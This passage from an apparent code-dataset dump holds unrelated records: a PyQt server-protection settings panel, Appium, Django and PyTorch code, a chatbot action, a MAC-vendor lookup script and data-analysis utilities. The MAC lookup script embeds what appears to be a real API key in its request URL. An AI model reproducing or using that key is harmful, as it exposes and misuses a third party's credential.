== 0:\n self.adminTagSafeNetMailValue = 1\n self.adminTagSafeNetMailText.setText(_fromUtf8(\"等待应用到服务器\"))\n self.adminTagSafeNetMailOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_open_1.png);\"))\n else:\n self.adminTagSafeNetMailValue = 0\n self.adminTagSafeNetMailText.setText(_fromUtf8(\"等待应用到服务器\"))\n self.adminTagSafeNetMailOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_close_1.png);\"))\n elif line == 6 and col == 2:\n if self.adminTagSafeNetWebValue == 0:\n self.adminTagSafeNetWebValue = 1\n 
self.adminTagSafeNetWebText.setText(_fromUtf8(\"等待应用到服务器\"))\n self.adminTagSafeNetWebOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_open_1.png);\"))\n else:\n self.adminTagSafeNetWebValue = 0\n self.adminTagSafeNetWebText.setText(_fromUtf8(\"等待应用到服务器\"))\n self.adminTagSafeNetWebOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_close_1.png);\"))\n\n def onAdminTagSafeSet(self):\n url = 'https://%s:%s/safeset/%s' % (self._Config['Service']['IP'], self._Config['Service']['Port'], self.LoginName)\n data = {\n 'Tokey' : self.Tokey,\n 'Mode' : self.adminTagSafeModeValue,\n 'FileEtc' : self.adminTagSafeFileEtcValue,\n 'FileLib' : self.adminTagSafeFileLibValue,\n 'FileBin' : self.adminTagSafeFileBinValue,\n 'FileBoot' : self.adminTagSafeFileBootValue,\n 'NetFtp' : self.adminTagSafeNetFtpValue,\n 'NetTelnet': self.adminTagSafeNetTelnetValue,\n 'NetMail' : self.adminTagSafeNetMailValue,\n 'NetWeb' : self.adminTagSafeNetWebValue,\n }\n param = {'Data' : json.dumps(data)} \n rt = HttpsPost(url, param)\n if rt[0] == 0:\n res = rt[1]\n #print 'safeset Request Set:', data\n #print 'safeset Response Set:', res\n self._AdminSafeUpdateStaus(res)\n else:\n QtGui.QMessageBox.about(self, u\"设置\", u\"设置失败:\" + rt[1])\n \n \n def AdminSafeGetStatus(self):\n url = 'https://%s:%s/safeget/%s' % (self._Config['Service']['IP'], self._Config['Service']['Port'], self.LoginName)\n data = {\n 'Tokey' : self.Tokey,\n } \n param = {'Data' : json.dumps(data)} \n rt = HttpsPost(url, param)\n \n if rt[0] == 0:\n res = rt[1]\n #print 'safeget Request Get:', data\n #print 'safeget Response Get:', res\n self._AdminSafeUpdateStaus(res)\n else:\n QtGui.QMessageBox.about(self, u\"设置\", u\"获取设置失败:\" + rt[1])\n\n def _AdminSafeUpdateStaus(self, res):\n if res['Status'] == 0:\n self.adminTagSafeModeValue = res['Mode']\n self.adminTagSafeFileEtcValue = res['FileEtc']\n self.adminTagSafeFileLibValue = res['FileLib']\n self.adminTagSafeFileBinValue = res['FileBin']\n self.adminTagSafeFileBootValue = res['FileBoot']\n self.adminTagSafeNetFtpValue = res['NetFtp']\n self.adminTagSafeNetTelnetValue = res['NetTelnet']\n self.adminTagSafeNetMailValue = res['NetMail']\n self.adminTagSafeNetWebValue = res['NetWeb']\n # 更新数据\n self.adminTagSafeFileEtcText.setText(_fromUtf8(\"已应用到服务器\"))\n self.adminTagSafeFileLibText.setText(_fromUtf8(\"已应用到服务器\"))\n self.adminTagSafeFileBinText.setText(_fromUtf8(\"已应用到服务器\"))\n #self.adminTagSafeFileBootText.setText(_fromUtf8(\"已应用到服务器\"))\n self.adminTagSafeNetFtpText.setText(_fromUtf8(\"已应用到服务器\"))\n self.adminTagSafeNetTelnetText.setText(_fromUtf8(\"已应用到服务器\"))\n self.adminTagSafeNetMailText.setText(_fromUtf8(\"已应用到服务器\"))\n self.adminTagSafeNetWebText.setText(_fromUtf8(\"已应用到服务器\"))\n\n if self.adminTagSafeModeValue == 1:\n self.adminTagSafeMode.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_mode_on.png);\"))\n self.adminTagSafeFileEtcModeText.setText(_fromUtf8(\"保护模式\"))\n self.adminTagSafeFileLibModeText.setText(_fromUtf8(\"保护模式\"))\n self.adminTagSafeFileBinModeText.setText(_fromUtf8(\"保护模式\"))\n #self.adminTagSafeFileBootModeText.setText(_fromUtf8(\"保护模式\"))\n self.adminTagSafeNetFtpModeText.setText(_fromUtf8(\"保护模式\"))\n self.adminTagSafeNetTelnetModeText.setText(_fromUtf8(\"保护模式\"))\n self.adminTagSafeNetMailModeText.setText(_fromUtf8(\"保护模式\"))\n self.adminTagSafeNetWebModeText.setText(_fromUtf8(\"保护模式\"))\n else:\n self.adminTagSafeMode.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_mode_off.png);\"))\n 
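# mode flag is 0, so every feature row falls back to the maintenance-mode label\n                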
self.adminTagSafeFileEtcModeText.setText(_fromUtf8(\"维护模式\"))\n self.adminTagSafeFileLibModeText.setText(_fromUtf8(\"维护模式\"))\n self.adminTagSafeFileBinModeText.setText(_fromUtf8(\"维护模式\"))\n #self.adminTagSafeFileBootModeText.setText(_fromUtf8(\"维护模式\"))\n self.adminTagSafeNetFtpModeText.setText(_fromUtf8(\"维护模式\"))\n self.adminTagSafeNetTelnetModeText.setText(_fromUtf8(\"维护模式\"))\n self.adminTagSafeNetMailModeText.setText(_fromUtf8(\"维护模式\"))\n self.adminTagSafeNetWebModeText.setText(_fromUtf8(\"维护模式\"))\n \n if self.adminTagSafeFileEtcValue == 1:\n self.adminTagSafeFileEtcOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_open_1.png);\"))\n else:\n self.adminTagSafeFileEtcOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_close_1.png);\"))\n\n if self.adminTagSafeFileLibValue == 1:\n self.adminTagSafeFileLibOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_open_1.png);\"))\n else:\n self.adminTagSafeFileLibOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_close_1.png);\"))\n\n if self.adminTagSafeFileBinValue == 1:\n self.adminTagSafeFileBinOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_open_1.png);\"))\n else:\n self.adminTagSafeFileBinOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_close_1.png);\"))\n \n #if self.adminTagSafeFileBootValue == 1:\n # self.adminTagSafeFileBootOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_open_1.png);\"))\n #else:\n # self.adminTagSafeFileBootOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_close_1.png);\"))\n\n if self.adminTagSafeNetFtpValue == 1:\n self.adminTagSafeNetFtpOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_open_1.png);\"))\n else:\n self.adminTagSafeNetFtpOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_close_1.png);\"))\n \n if self.adminTagSafeNetTelnetValue == 1:\n self.adminTagSafeNetTelnetOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_open_1.png);\"))\n else:\n self.adminTagSafeNetTelnetOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_close_1.png);\"))\n \n if self.adminTagSafeNetMailValue == 1:\n self.adminTagSafeNetMailOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_open_1.png);\"))\n else:\n self.adminTagSafeNetMailOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_close_1.png);\"))\n \n if self.adminTagSafeNetWebValue == 1:\n self.adminTagSafeNetWebOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_open_1.png);\"))\n else:\n self.adminTagSafeNetWebOnOff.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_close_1.png);\")) \n else:\n QtGui.QMessageBox.about(self, u\"设置\", u\"获取设置失败:\" + res['ErrMsg'])\n\n\nimport images_rc\n","sub_path":"UI/admin_board_safe.py","file_name":"admin_board_safe.py","file_ext":"py","file_size_in_byte":22964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"108346787","text":"from appium import webdriver\nfrom Util.write_user_command import WriteUserCommand\nimport time\n\n# iPhone_Simulator = True\niPhone_Simulator = False\n\n\nclass BaseDriver:\n # def __init__(self, i):\n # self.write_file = WriteUserCommand()\n # self.port = self.write_file.get_value('user_info_'+str(i), 'port')\n # self.device_name = self.write_file.get_value('user_info_'+str(i), 'deviceName')\n\n def iOS_driver(self, i):\n write_file = WriteUserCommand()\n port = write_file.get_value('user_info_' + str(i), 'port')\n device_name = write_file.get_value('user_info_' + 
str(i), 'deviceName')\n        desired_capabilities = {\n            'automationName': 'XCUITest',\n            'platformName': 'iOS'\n        }\n\n        if iPhone_Simulator:\n            file_path = '/Users/mike/Desktop/baidu/Tomasky.app'\n            desired_capabilities['deviceName'] = 'iPhone Simulator'\n            desired_capabilities['platformVersion'] = '11.4'\n\n        else:\n            file_path = '/Users/mike/Desktop/Tomasky.app'\n            desired_capabilities['udid'] = device_name\n            desired_capabilities['deviceName'] = 'iPhone 6s'\n            desired_capabilities['platformVersion'] = '11.4.1'\n\n        desired_capabilities['app'] = file_path\n        driver = webdriver.Remote(\"http://127.0.0.1:\"+port+\"/wd/hub\", desired_capabilities)\n        # driver = webdriver.Remote(\"http://127.0.0.1:4723/wd/hub\", desired_capabilities)\n        time.sleep(20)\n\n        # if driver.is_app_installed('com.yodfz.FanQie'):\n        #     pass\n        # else:\n        #     driver.switch_to.alert.accept()\n\n        return driver\n\n    def Android_driver(self):\n        pass\n    # xcodebuild - project\n    # WebDriverAgent.xcodeproj - scheme\n    # WebDriverAgentRunner - destination\n    # 'id=d69d11788a251a64fc31dfbc93c9053cfca5cbca'\n    # test\n\n\nif __name__ == '__main__':\n    base_driver = BaseDriver()\n    ios_driver = base_driver.iOS_driver(0)\n    ios_driver.find_element_by_id('id_main_account').click()\n","sub_path":"FanQie/BasePy/base_driver.py","file_name":"base_driver.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"554535561","text":"from django.core.exceptions import ValidationError\nfrom django.db import transaction\nfrom rest_framework import serializers\n\nfrom apps.orders.models import Order, OrderItem\nfrom apps.products.serializers import ProductSerializer\n\n\nclass OrderItemSerializer(serializers.ModelSerializer):\n    product = ProductSerializer()\n\n\n    class Meta:\n        model = OrderItem\n        exclude = []\n        extra_kwargs = {\n            'order': {\n                'required': False\n            }\n        }\n\n\nclass OrderSerializer(serializers.ModelSerializer):\n    order_items = OrderItemSerializer(many=True)\n\n    class Meta:\n        model = Order\n        exclude = []\n\n    def create(self, validated_data):\n        try:\n            with transaction.atomic():\n                order_items = validated_data.pop('order_items')\n\n                order = super(OrderSerializer, self).create(validated_data)\n\n                for order_item in order_items:\n                    OrderItem.objects.create(\n                        order=order,\n                        **order_item\n                    )\n\n        except KeyError:\n            raise ValidationError('send the data properly')\n        else:\n            return order\n","sub_path":"apps/orders/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"478015581","text":"from Abstract.AActionSubclasses.ActionLine import ActionLine\n\n\nclass CChangeIntent(ActionLine):\n\n    def __init__(self,chatbot):\n        \"\"\"\n        Class constructor.\n        :param chatbot: The ChatBot that has an instance of this class as its action.\n        \"\"\"\n        self.chatbot = chatbot\n\n    def exec(self,):\n        \"\"\"\n        Changes the current intent to another, already created one.\n        :return: void\n        \"\"\"\n        if self.chatbot.currentStructureChatBot is None:\n            self.chatbot.output.exec('ERROR: No se puede cambiar de Intención porque no hay un Chatbot actual.')\n        else:\n            self.chatbot.showRandomResponse()\n            sentence = self.chatbot.input.exec()\n            if not(self.checkCancellation(sentence)):\n                if not self.chatbot.isEmpty(sentence):\n                    self.chatbot.currentStructureChatBot.setCurrentIntent(sentence) # change the current intent\n                else:\n                    self.chatbot.output.exec('No se admiten valores vacíos.')\n\n    # def 
checkCancellation(self,sentence):\n # if (sentence.lower() in self.listKeysWordsCancelRunning):\n # self.chatbot.output.exec('Se ha cancelado la operación.')\n # return True\n # else:\n # return False","sub_path":"Chatbots/MetaChatBot/Actions/LineClasses/ChangeIntent.py","file_name":"ChangeIntent.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"81253961","text":"\"\"\"hello_django URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\nfrom hello2 import views\nfrom django.views.generic import TemplateView\n\nurlpatterns = [\n url(r'^home/$', views.home, name='home'),\n url(r'^addmessage/$', views.add_message, name='add_message'),\n url(r'^home/file/$', views.file, name='file'),\n url(r'^hello/(?P\\d*)/$', views.checked_message, name='checked_message'),\n url(r'^$', TemplateView.as_view(template_name='index.html')),\n url(r'^ajax/show/$',views.showtmp),\n url(r'^ajax/show/(?P\\w*)/$',views.showtmp2),\n url(r'^test/', views.test),\n url(r'^ajax/add/$',views.add),\n url(r'^ajax/addselect/$', views.addselect),\n url(r'^serializer/message/$', views.MessageListView.as_view(), name='serializer_message'),\n url(r'Middewaretest/$', views.Middewaretest)\n #url(r'^hello/delete/(?P\\w*)/$', views.delete_user, name='deleteuser'),\n #url(r'^jinja2/$', views.jinja2, name='adduser')\n]\n\n\n","sub_path":"hello2/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"389596628","text":"import pandas as pd\nfrom PIL import Image\nimport numpy as np\nfrom tqdm import tqdm\nimport torch\nfrom torch.utils.data import DataLoader, Dataset\nfrom torchvision import transforms\nimport os\nimport random\n\n\n\n\ndef get_n_features(sensor):\n if sensor == 'All':\n val = 8 * 8 * 32\n return val\n elif sensor == 'hand_camera':\n return 512 # 1024\n elif sensor == 'head_depth':\n return 1000 # 512\n elif sensor == 'force_torque':\n return 256\n elif sensor == 'mic':\n return 256 # 128\n\n\nclass HsrDataset(Dataset):\n def __init__(self, args, idxs, dataframe, test=False):\n self.args = args\n self.idxs = idxs\n self.dataframe = dataframe\n\n self.batch_size = args.batch_size\n\n self.unimodal = True\n self.All = False\n self.force_torque = False\n self.mic = False\n self.hand_camera = False\n self.head_depth = False\n\n if args.sensor == 'All':\n self.All = True\n self.unimodal = False\n elif args.sensor == 'force_torque':\n self.force_torque = True\n elif args.sensor == 'mic':\n self.mic = True\n elif args.sensor == 'hand_camera':\n self.hand_camera = True\n elif args.sensor == 'head_depth':\n self.head_depth = True\n\n\n\n def __len__(self):\n return len(self.idxs)\n\n def __getitem__(self, idx):\n idxs = self.idxs[idx]\n r = torch.tensor([])\n d = torch.tensor([])\n m = torch.tensor([])\n t = torch.tensor([])\n 
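# each index triple selects three consecutive rows, i.e. one 0.3-second sample window (see split_train_test)\n        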
cur_rows = self.dataframe.loc[idxs[0]:idxs[2]]\n label = cur_rows['label'].tolist()\n\n # [ 0, 0, 1], [0, 1, 1], [1, 1, 1] is abnormal\n if 1 in label: # 1 == positive\n label = 1\n else: # 0 == negative\n label = 0\n\n if self.force_torque or self.All:\n hand_weight_series = cur_rows['cur_hand_weight']\n t = hand_weight_series.to_numpy()\n t = torch.from_numpy(t.astype(np.float32)) # t = torch.from_numpy(t.astype(np.float32))\n if self.mic or self.All:\n mic_df = cur_rows['mfcc00']\n for i in range(1, 16):\n if i < 10:\n mic_df = pd.concat([mic_df, cur_rows['mfcc0' + str(i)]], axis=1)\n else:\n mic_df = pd.concat([mic_df, cur_rows['mfcc' + str(i)]], axis=1)\n m = mic_df.to_numpy()\n m = torch.from_numpy(m.astype(np.float32)) # m = torch.from_numpy(m.astype(np.float32))\n if self.All:\n data_dirs = cur_rows['data_dir']\n r_img_dirs = cur_rows['cur_hand_id']\n d_img_dirs = cur_rows['cur_depth_id']\n r_sub_path = '/data/img/hand/'\n d_sub_path = '/data/img/d/'\n firstRow = True\n\n\n for r_img_dir, d_img_dir, data_dir in zip(r_img_dirs, d_img_dirs, data_dirs):\n r_img_dir = self.args.origin_datafile_path + data_dir + r_sub_path + str(int(r_img_dir)) + '.png'\n d_img_dir = self.args.origin_datafile_path + data_dir + d_sub_path + str(int(d_img_dir)) + '.png'\n\n r_im = Image.open(r_img_dir).resize((32, 32))\n r_im = np.array(r_im)\n d_im = Image.open(d_img_dir).resize((32, 32))\n d_im = np.array(d_im)\n d_im = d_im[:, :, np.newaxis] # unsqueeze\n\n if firstRow:\n firstRow = False\n r_base_im_arr = [r_im]\n d_base_im_arr = [d_im]\n\n\n else:\n r_base_im_arr = np.concatenate((r_base_im_arr, [r_im]), axis=0)\n d_base_im_arr = np.concatenate((d_base_im_arr, [d_im]), axis=0)\n\n r_base_im_arr = r_base_im_arr.transpose((0, 3, 1, 2))\n r = torch.FloatTensor(r_base_im_arr)\n\n d_base_im_arr = d_base_im_arr.transpose((0, 3, 1, 2))\n d = torch.FloatTensor(d_base_im_arr)\n\n\n if self.hand_camera:\n data_dirs = cur_rows['data_dir']\n r_img_dirs = cur_rows['cur_hand_id']\n r_sub_path = '/data/img/hand/'\n firstRow = True\n\n for r_img_dir, data_dir in zip(r_img_dirs, data_dirs):\n r_img_dir = self.args.origin_datafile_path + data_dir + r_sub_path + str(int(r_img_dir)) + '.png'\n\n r_im = Image.open(r_img_dir).resize((32, 32))\n r_im = np.array(r_im)\n\n if firstRow:\n firstRow = False\n r_base_im_arr = [r_im]\n\n\n else:\n r_base_im_arr = np.concatenate((r_base_im_arr, [r_im]), axis=0)\n\n r_base_im_arr = r_base_im_arr.transpose((0, 3, 1, 2))\n r = torch.FloatTensor(r_base_im_arr)\n\n\n if self.head_depth:\n data_dirs = cur_rows['data_dir']\n d_img_dirs = cur_rows['cur_depth_id']\n d_sub_path = '/data/img/d/'\n firstRow = True\n\n for d_img_dir, data_dir in zip(d_img_dirs, data_dirs):\n d_img_dir = self.args.origin_datafile_path + data_dir + d_sub_path + str(int(d_img_dir)) + '.png'\n\n d_im = Image.open(d_img_dir).resize((32, 32))\n d_im = np.array(d_im)\n d_im = d_im[:, :, np.newaxis] # unsqueeze\n\n if firstRow:\n firstRow = False\n d_base_im_arr = [d_im]\n else:\n d_base_im_arr = np.concatenate((d_base_im_arr, [d_im]), axis=0)\n\n d_base_im_arr = d_base_im_arr.transpose((0, 3, 1, 2))\n d = torch.FloatTensor(d_base_im_arr)\n\n return r, d, m, t, label\n\n\ndef get_loaders(args):\n # 1. get whole dataset\n full_dataframe = get_Dataframe(args)\n\n # 2. 
split it in to train, valid, test.\n trainset, validset, testset = split_train_test(full_dataframe, args)\n\n return DataLoader(trainset, batch_size=args.batch_size, num_workers=args.workers, shuffle=args.shuffle_batch), \\\n DataLoader(validset, batch_size=args.batch_size, num_workers=args.workers,shuffle=args.shuffle_batch), \\\n DataLoader(testset, batch_size=args.batch_size, num_workers=args.workers)\n\ndef split_train_test(full_dataframe, args):\n # set to 0.3 seconds unit\n data_len = len(full_dataframe.index)\n # train 30800\n idxs = [[i, i+1, i+2] for i in range(data_len - 2)]\n normal_idx = []\n abnormal_idx = []\n normal_idx_dir = args.dataset_file_path + args.dataset_file_name + '_normal_idx.pt' # _book_normal_idx.pt\n abnormal_idx_dir = args.dataset_file_path + args.dataset_file_name + '_abnormal_idx.pt' # _book_abnormal_idx.pt\n if False: # os.path.exists(normal_idx_dir)\n normal_idx = torch.load(normal_idx_dir)\n abnormal_idx = torch.load(abnormal_idx_dir)\n else:\n for a, b, c in tqdm(idxs):\n if full_dataframe.loc[a]['label'] == 0 and full_dataframe.loc[b]['label'] == 0 and full_dataframe.loc[c]['label'] == 0:\n normal_idx.append([a,b,c])\n elif (full_dataframe.loc[a]['label'] == 0 and full_dataframe.loc[b]['label'] == 0 and full_dataframe.loc[c]['label'] == 1):\n abnormal_idx.append([a, b, c])\n abnormal_idx.append([a+1, b+1, c+1])\n abnormal_idx.append([a+2, b+2, c+2])\n abnormal_idx.append([a+3, b+3, c+3])\n abnormal_idx.append([a+4, b+4, c+4])\n torch.save(normal_idx, normal_idx_dir)\n torch.save(abnormal_idx, abnormal_idx_dir)\n\n train_valid_test_ratio = [0.6, 0.2, 0.2]\n train_valid_size = [int(train_valid_test_ratio[0] * len(normal_idx)), int(train_valid_test_ratio[1] * len(normal_idx))]\n\n random.shuffle(normal_idx)\n\n trainset_idxs = normal_idx[:train_valid_size[0]]\n validset_idxs = normal_idx[train_valid_size[0]:train_valid_size[0] + train_valid_size[1]]\n testset_idxs = normal_idx[train_valid_size[0] + train_valid_size[1]:]\n\n # normal_idx = 50082\n # train 30049\n trainset = HsrDataset(args, trainset_idxs, full_dataframe)\n # valid 10016\n validset = HsrDataset(args, validset_idxs, full_dataframe)\n # test 10017 + 4800 = 14817\n testset = HsrDataset(args, testset_idxs+abnormal_idx, full_dataframe, test=True)\n return trainset, validset, testset\n\n\ndef get_Dataframe(args):\n All = False\n force_torque = False\n mic = False\n hand_camera = False\n head_depth = False\n\n if args.sensor == 'All':\n All = True\n elif args.sensor == 'force_torque':\n force_torque = True\n elif args.sensor == 'mic':\n mic = True\n elif args.sensor == 'hand_camera':\n hand_camera = True\n elif args.sensor == 'head_depth':\n head_depth = True\n\n # 0. save file already existed\n # if os.path.exists(args.save_data_name):\n # return torch.load(args.save_data_name)\n\n # 1. 
load csv files\n file_path = args.dataset_file_path + args.dataset_file_name # dataset/data_sum\n if args.dataset_file_name == 'data_sum':\n df_datasum = pd.read_csv(file_path + '0.csv')\n df_datasum = df_datasum.append(pd.read_csv(file_path + '1.csv'), ignore_index=True)\n df_datasum = df_datasum.append(pd.read_csv(file_path + '2.csv'), ignore_index=True)\n df_datasum = df_datasum.append(pd.read_csv(file_path + '3.csv'), ignore_index=True)\n df_datasum = df_datasum.append(pd.read_csv(file_path + '4.csv'), ignore_index=True)\n df_datasum = df_datasum.append(pd.read_csv(file_path + '5.csv'), ignore_index=True)\n df_datasum = df_datasum.append(pd.read_csv(file_path + '6.csv'), ignore_index=True)\n df_datasum = df_datasum.append(pd.read_csv(file_path + '7.csv'), ignore_index=True)\n if args.object_select_mode:\n df_objectlist = pd.read_csv(args.object_type_datafile_path)\n print(args.object_type)\n df_objectlist = df_objectlist[args.object_type]\n object_dir_list = df_objectlist.to_list()\n df_datasum = df_datasum[df_datasum['data_dir'].isin(object_dir_list)]\n else:\n # dataset_file_name == 'data_sum_motion' or 'data_sum_free'\n df_datasum = pd.read_csv(file_path + '0.csv')\n\n df_datasum.index = [i for i in range(len(df_datasum.index))]\n ## 2. essential erase\n if All:\n return df_datasum\n elif force_torque:\n hand_weight_series = df_datasum['cur_hand_weight']\n label_series = df_datasum['label']\n return pd.concat([hand_weight_series, label_series], axis=1)\n elif mic:\n mic_df = df_datasum['mfcc00']\n for i in range(1, 16):\n if i < 10:\n mic_df = pd.concat([mic_df, df_datasum['mfcc0' + str(i)]], axis=1)\n else:\n mic_df = pd.concat([mic_df, df_datasum['mfcc' + str(i)]], axis=1)\n label_series = df_datasum['label']\n return pd.concat([mic_df, label_series], axis=1)\n elif hand_camera or head_depth:\n hand_series = df_datasum['cur_hand_id']\n depth_series = df_datasum['cur_depth_id']\n data_dir = df_datasum['data_dir']\n label_series = df_datasum['label']\n return pd.concat([hand_series, depth_series, data_dir, label_series], axis=1)\n\n ##########################################################################\n# for layer_wised diff\ndef get_transformed_data(data_loader, model):\n \"\"\"\n Multi indexing support\n \"\"\"\n x = []\n y = []\n for r, d, m, t, _y in tqdm(data_loader):\n try:\n _x = model.fusion(r, d, m, t)\n x.append(_x)\n y.append(_y)\n except Exception as e:\n pass\n\n if type(_x) == np.ndarray:\n x = np.stack(x)\n elif type(_x) == torch.Tensor:\n x = torch.stack(x)\n else:\n raise NotImplementedError\n\n if type(_y) == np.ndarray:\n y = np.array(y)\n elif type(_y) == torch.Tensor:\n y = torch.stack(y)\n\n return x, y\n\n\n\n","sub_path":"modules/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":11956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"12734880","text":"import requests\nimport sys\n\n\ndef get_mac_details(get_url):\n try:\n mac_address = sys.argv[1]\n get_url += mac_address\n res = requests.get(url=get_url)\n\n api_result = res.json()\n\n return api_result[\"vendorDetails\"].get(\"companyName\")\n except Exception as _e:\n print(f\"Exception in getting the company name: {_e}\")\n return None\n\n\n\n\nif __name__ == \"__main__\":\n\n get_url = \"https://api.macaddress.io/v1?apiKey=at_0wTH4bbyRfos4Bf8x04poMaKipGXV&output=json&search=\"\n \n company_name = get_mac_details(get_url)\n 
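# prints None when the vendor lookup fails inside get_mac_details\n 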
print(company_name)\n","sub_path":"get_mac_details.py","file_name":"get_mac_details.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"436230577","text":"from itertools import islice\n\nimport numpy as np\nfrom numpy.random import permutation\n\n\ndef numerical_grad(func, input_, h=1e-6):\n \"\"\"Computes partial derivatives of func wrt. input_ using the\n center divided difference method. Used to gradient check\n analytical solutions.\n\n Parameters\n ----------\n func: callable\n A function whose derivatives should be computed.\n\n input_: scalar or array-like\n Partial derivatives are computed wrt. input_.\n\n h: float, default 1e-6\n A spacing used when computing the difference, should\n be small.\n\n Returns\n -------\n grad: scalar or array-like of shape input_.shape\n \"\"\"\n\n if np.isscalar(input_):\n return np.sum((func(input_ + h) - func(input_ - h)) / (2 * h))\n\n grad = np.zeros(input_.shape)\n\n for i in np.ndindex(input_.shape):\n forward = input_.copy()\n forward[i] += h\n\n backward = input_.copy()\n backward[i] -= h\n\n center_divided_diff = (func(forward) - func(backward)) / (2 * h)\n grad[i] = np.sum(center_divided_diff)\n\n return grad\n\n\ndef yield_data_in_batches(batch_size, X, y=None, shuffle=True):\n \"\"\"Generates batches of input data.\n\n Parameters\n ----------\n batch_size: int\n Number of examples in a single batch.\n\n X: array-like, shape (n_samples, n_features)\n The input data.\n\n y: array-like, shape (n_samples,)\n The target values. Can be omitted.\n\n shuffle: bool, default True\n Whether the examples are shuffled or not before\n put into batches.\n \"\"\"\n num_rows = X.shape[0]\n\n if shuffle:\n indices_gen = (i for i in permutation(num_rows))\n else:\n indices_gen = (i for i in np.arange(num_rows))\n\n num_yielded = 0\n\n while True:\n batch_indices = list(islice(indices_gen, batch_size))\n num_yielded += len(batch_indices)\n\n if y is None:\n yield X[batch_indices]\n else:\n yield X[batch_indices], y[batch_indices]\n\n if num_yielded == num_rows:\n return\n\n\ndef classification_accuracy(y, y_pred):\n \"\"\"Computes the classification accuracy.\n\n Parameters\n ----------\n y: array-like, shape (n_samples,)\n The true target values (i.e. 
the ground truths).\n\n y_pred: array-like, shape (n_samples,)\n The predicted target values.\n \"\"\"\n return np.mean(np.equal(y, y_pred))\n","sub_path":"nnlib/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"42005928","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 29 09:23:28 2018\n\n@author: Administrator\n\"\"\"\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport numpy as np\nfrom sklearn.metrics import mean_absolute_error\nimport pandas as pd\n########################\n\n###Load and create LUT database first\nY1 = pd.read_csv('calibrationcrop.csv',header=None)\n#Pandas dataframe to matrix conversion\nYm=Y1.values\n#Incidence angle\nthr=Ym[:,3]#Col3==Local Inc Angle in rad\nthr = np.float64(thr)\nYm0=np.float64(Ym[:,0])#Col0==PAI_True\n#Ym1=np.float64(Ym[:,1])#Col1==Wetbiomass;\nYm2=np.float64(Ym[:,2])#Col2==Soilmoisture\nY=np.column_stack((Ym0,Ym2))\n\n\nXVH = pd.read_csv('VHsimulatedCorn.csv',header=None)\n#XVH=np.float64(XVH.as_matrix(columns=None))\nXVV = pd.read_csv('VVsimulatedCorn.csv',header=None)\n#XVV=np.float64(XVV.as_matrix(columns=None))\n#X=np.column_stack((XHH,XHV,XVH,XVV))\n#X=np.column_stack((XHH,XHV,XVH,XVV,thr))\n\nY2=pd.concat([XVH,XVV,Y1],axis=1,ignore_index=True)\n############################\n\ndf1=np.column_stack((Ym0,Ym2,XVH,XVV,thr))\n\n########################################################################################################\n###Load validation data\n#replacing 'no info' and '.' i.e. blank space or 'None' string with NaN\ncornval = pd.read_excel('ValidationPoints.xlsx',na_values = ['no info', '.','None','#VALUE!', '#DIV/0!'],skiprows=[0],header=None);\nvald=cornval.dropna(subset=[1]) \n \nvaldm=vald.values\n\n#Incidence angle\nvalthr=(3.1415/180)*valdm[:,0]#Col15==Local Inc Angle\nvalthr = np.float64(valthr)\n#valHH=np.float64(valdm[:,17])#Col16==HH; 17==HV; 18==VH; 19==VV\n#valHV=np.float64(valdm[:,18])\nvalVH=np.float64(valdm[:,4])\nvalVV=np.float64(valdm[:,3])\nvallai=np.float64(valdm[:,1])#Col6==PAI_True; Col7==LAI\nvalbiom=np.float64(valdm[:,1])#Col9==Wetbiomass; Col8==VWC; 